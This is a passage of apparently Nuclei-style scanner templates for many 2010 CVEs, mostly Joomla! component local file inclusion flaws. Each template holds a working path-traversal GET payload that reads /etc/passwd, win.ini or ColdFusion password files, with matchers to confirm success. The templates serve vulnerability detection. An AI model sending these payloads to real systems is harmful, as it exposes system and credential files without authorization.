Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0696","info":{"name":"Joomla! Component Jw_allVideos - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4977","info":{"name":"Joomla! Component Canteen 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1875","info":{"name":"Joomla! Component Property - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1313","info":{"name":"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1953","info":{"name":"Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1658","info":{"name":"Joomla! Component NoticeBoard 1.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4239","info":{"name":"Tiki Wiki CMS Groupware 5.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2010-2034","info":{"name":"Joomla! Component Percha Image Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1353","info":{"name":"Joomla! Component LoginBox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1476","info":{"name":"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0759","info":{"name":"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1307","info":{"name":"Joomla! Component Magic Updater - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1219","info":{"name":"Joomla! Component com_janews - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2128","info":{"name":"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1717","info":{"name":"Joomla! Component iF surfALERT 1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1603","info":{"name":"Joomla! Component ZiMBCore 0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1352","info":{"name":"Joomla! Component Juke Box 1.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0942","info":{"name":"Joomla! Component com_jvideodirect - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1535","info":{"name":"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1302","info":{"name":"Joomla! Component DW Graph - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1081","info":{"name":"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1722","info":{"name":"Joomla! Component Online Market 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1312","info":{"name":"Joomla! Component News Portal 1.5.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1474","info":{"name":"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1217","info":{"name":"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2307","info":{"name":"Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1715","info":{"name":"Joomla! Component Online Exam 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3203","info":{"name":"Joomla! Component PicSell 1.0 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1471","info":{"name":"Joomla! Component Address Book 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0943","info":{"name":"Joomla! Component com_jashowcase - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1653","info":{"name":"Joomla! Component Graphics 1.0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1306","info":{"name":"Joomla! Component Picasa 2.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0944","info":{"name":"Joomla! Component com_jcollection - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2507","info":{"name":"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1532","info":{"name":"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1540","info":{"name":"Joomla! Component com_blog - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4719","info":{"name":"Joomla! Component JRadio - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1534","info":{"name":"Joomla! Component Shoutbox Pro - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2682","info":{"name":"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4231","info":{"name":"Camtron CMNC-200 IP Camera - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0157","info":{"name":"Joomla! Component com_biblestudy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1977","info":{"name":"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1983","info":{"name":"Joomla! Component redTWITTER 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4282","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1601","info":{"name":"Joomla! Component JA Comment - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2861","info":{"name":"Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rdspassword=","encrypted="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1957","info":{"name":"Joomla! Component Love Factory 1.3.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1954","info":{"name":"Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1982","info":{"name":"Joomla! Component JA Voice 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2259","info":{"name":"Joomla! Component com_bfsurvey - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1659","info":{"name":"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4617","info":{"name":"Joomla! Component JotLoader 2.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1531","info":{"name":"Joomla! Component redSHOP 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2036","info":{"name":"Joomla! Component Percha Fields Attach 1.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1602","info":{"name":"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2037","info":{"name":"Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1354","info":{"name":"Joomla! Component VJDEO 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4769","info":{"name":"Joomla! Component Jimtawl 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1719","info":{"name":"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5278","info":{"name":"MODx manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1478","info":{"name":"Joomla! Component Jfeedback 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1980","info":{"name":"Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5028","info":{"name":"Joomla! Component JE Job 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1533","info":{"name":"Joomla! Component TweetLA 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1056","info":{"name":"Joomla! Component com_rokdownloads - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2857","info":{"name":"Joomla! Component Music Manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1475","info":{"name":"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1955","info":{"name":"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1723","info":{"name":"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1858","info":{"name":"Joomla! Component SMEStorage - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1472","info":{"name":"Joomla! Component Horoscope 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1308","info":{"name":"Joomla! Component SVMap 1.1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5286","info":{"name":"Joomla! Component Jstore - 'Controller' Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1979","info":{"name":"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1718","info":{"name":"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1345","info":{"name":"Joomla! Component Cookex Agency CKForms - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2050","info":{"name":"Joomla! Component MS Comment 0.8.0b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2680","info":{"name":"Joomla! Component jesectionfinder - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1494","info":{"name":"Joomla! Component AWDwall 1.5.4 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1340","info":{"name":"Joomla! Component com_jresearch - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1878","info":{"name":"Joomla! Component OrgChart 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1314","info":{"name":"Joomla! Component Highslide 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0982","info":{"name":"Joomla! Component com_cartweberp - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1952","info":{"name":"Joomla! Component BeeHeard 1.0 - Local File 